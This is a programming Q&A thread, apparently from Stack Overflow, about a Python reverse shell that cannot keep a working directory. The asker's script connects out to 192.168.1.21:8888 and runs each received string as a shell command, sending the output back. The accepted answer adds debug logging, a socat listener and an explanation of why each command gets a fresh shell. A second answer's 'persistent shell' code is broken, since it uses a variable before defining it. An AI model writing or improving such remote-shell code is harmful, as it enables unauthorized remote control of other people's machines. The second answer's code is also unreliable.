# Why is my reverse shell not able to go into other directories?

Tags: python, shell, sockets

I am able to do most things inside the dir, but I can't cd out of it, trying /bin/sh causes the shell to freeze.

```
import os
import socket 
import time 
import subprocess

SERVER = '192.168.1.21'
PORT = 8888 

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((SERVER, PORT))

while True:
    
    BUFFER = sock.recv(2048).decode()

    CMD = subprocess.Popen(BUFFER, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

    CMD_RESULT = CMD.stdout.read() + CMD.stderr.read()

    sock.send(CMD_RESULT)
```

Comment: what about something like ```cd / && ls``` ? does that work ?
I think that everytime you run a command a new shell context is opened

Comment: Yeah that works and you're absolutely right, how can I fix this?

Comment: You would have to use `subprocess.Popen` to run an instance of `/bin/sh` before the loop starts, and then feed commands and read output from that instance inside the loop using stdin and stdout.  It's a pretty enormous security hole, of course.

Answer (score 0, accepted):

To illustrate better what is happening, I extended your script to have some debug logging:

```
import socket
import subprocess
import logging
logging.basicConfig(level=logging.DEBUG)

SERVER = '192.168.1.21'
PORT = 8888

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((SERVER, PORT))

while True:
    BUFFER = sock.recv(2048).decode()

    CMD = subprocess.Popen(BUFFER, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    logging.debug(f"{CMD.pid} : /bin/sh -c \"{CMD.args.strip()}\"")
    CMD_RESULT = CMD.stdout.read() + CMD.stderr.read()
    logging.debug(CMD_RESULT)

    sock.send(CMD_RESULT)
```

I ran the reverse shell in a terminal like this:

```
socat tcp-listen:8888,reuseaddr,fork stdin
```

I ran the following commands: `ls`, `cd ..`, `ls`, `cd .. && ls`, `/bin/sh`

These produced the following output in my python terminal:

```
DEBUG:root:61479 : /bin/sh -c "ls"
DEBUG:root:b'reverse.py\nvenv\n'

DEBUG:root:61481 : /bin/sh -c "cd .."
DEBUG:root:b''

DEBUG:root:61482 : /bin/sh -c "ls"
DEBUG:root:b'reverse.py\nvenv\n'

DEBUG:root:61484 : /bin/sh -c "cd .. && ls"
DEBUG:root:b'reverseshell\n'

DEBUG:root:61486 : /bin/sh -c "/bin/sh"
```

As you can see, each `subprocess.Popen` line spawns a new process with a new pid (in this specific output it's the 61479, 61486, etc...)

When a new shell is spawned, it will inherit the current working directory. Running `cd ..` completes successfully, and then that shell instance exits. The following `ls` command gets a fresh shell back in the inherited working directory that the previous command started from. Running `cd .. && ls` also completes successfully. both the cd and the ls are in the same shell instance, so you get the ls output of the next directory up.

The `/bin/sh` command hangs because it sees that it has a standard input being held open so it is waiting for input. Your python script does not pass along anything to the stdin of the process that it launches and instead waits until the process completes. This creates a situation where you get a hanging process until it is interrupted externally.

Answer (score 0):

Because everytime you send a command a new shell is created in the original folder.

To set an other working directory you have to send `cd /to/other/dir && yourcommand`

You can try setting the root folder for the new shell terminal:

```
subprocess.Popen(BUFFER, shell=True, cwd="/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
```

Or just open the terminal when the program launches:

```
import os
import socket 
import time 
import subprocess

SERVER = '192.168.1.21'
PORT = 8888 

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((SERVER, PORT))

CMD = subprocess.Popen(BUFFER, shell=True, cwd="/", stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)

while True:
    
    BUFFER = sock.recv(2048).decode()

    CMD_RESULT = CMD.communicate(input=BUFFER)[0]

    sock.send(CMD_RESULT)
```

Comment: @ezsex300 I modified my answer, please set it as solution if it solves your problem

Comment: From my understanding, this would still open a new shell every time I give input. How can I fix this with it just being a normal shell?